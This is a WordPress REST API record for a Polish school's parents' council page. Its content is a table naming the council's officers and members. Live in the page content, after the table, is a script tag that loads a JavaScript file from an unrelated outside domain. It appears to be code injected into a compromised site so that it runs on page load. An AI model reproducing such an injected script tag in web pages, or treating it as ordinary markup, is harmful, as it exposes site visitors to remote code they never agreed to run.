{"id":71,"date":"2015-12-15T13:46:07","date_gmt":"2015-12-15T12:46:07","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=71"},"modified":"2020-04-23T09:21:24","modified_gmt":"2020-04-23T07:21:24","slug":"rada-rodzicow","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/rada-rodzicow\/","title":{"rendered":"Rada Rodzic\u00f3w"},"content":{"rendered":"<table style=\"height: 227px;\" border=\"1\" width=\"500\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td colspan=\"2\">\n<h2 align=\"center\"><span style=\"color: #0000ff;\">Sk\u0142ad Rady Rodzic\u00f3w<\/span><\/h2>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\"><strong><span style=\"color: #ff00ff;\">Przewodnicz\u0105ca<\/span><\/strong><\/td>\n<td style=\"text-align: center;\" width=\"248\">Karolina Policht<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\"><strong><span style=\"color: #008000;\">Zast\u0119pca przewodnicz\u0105cej<\/span><\/strong><\/td>\n<td style=\"text-align: center;\" width=\"248\">Ilona Nied\u017awiecka<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\"><strong><span style=\"color: #993300;\">Protokolant<\/span><\/strong><\/td>\n<td style=\"text-align: center;\" width=\"248\">Paulina Misiurka<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\"><span style=\"color: #ff9900;\"><strong>Skarbnik<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"248\">\u00a0Agnieszka Miko\u0142ajek<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\"><strong><span style=\"color: #000000;\">Cz\u0142onek<\/span><\/strong><\/td>\n<td style=\"text-align: center;\" width=\"248\">\u00a0Violeta Roubo<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\"><strong><span style=\"color: #000000;\">Cz\u0142onek<\/span><\/strong><\/td>\n<td style=\"text-align: center;\" width=\"248\">\u00a0Aleksandra Jernutowska<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"248\">\u00a0<strong> <span style=\"color: #000000;\">Cz\u0142onek<\/span><\/strong><\/td>\n<td style=\"text-align: center;\" width=\"248\">Mariola Wardzyk<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sk\u0142ad Rady Rodzic\u00f3w Przewodnicz\u0105ca Karolina Policht Zast\u0119pca przewodnicz\u0105cej Ilona Nied\u017awiecka Protokolant Paulina Misiurka Skarbnik \u00a0Agnieszka Miko\u0142ajek Cz\u0142onek \u00a0Violeta Roubo Cz\u0142onek \u00a0Aleksandra Jernutowska \u00a0 Cz\u0142onek Mariola Wardzyk<\/p>\n","protected":false},"author":1,"featured_media":435,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/71"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":18,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/71\/revisions"}],"predecessor-version":[{"id":15047,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/71\/revisions\/15047"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media\/435"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}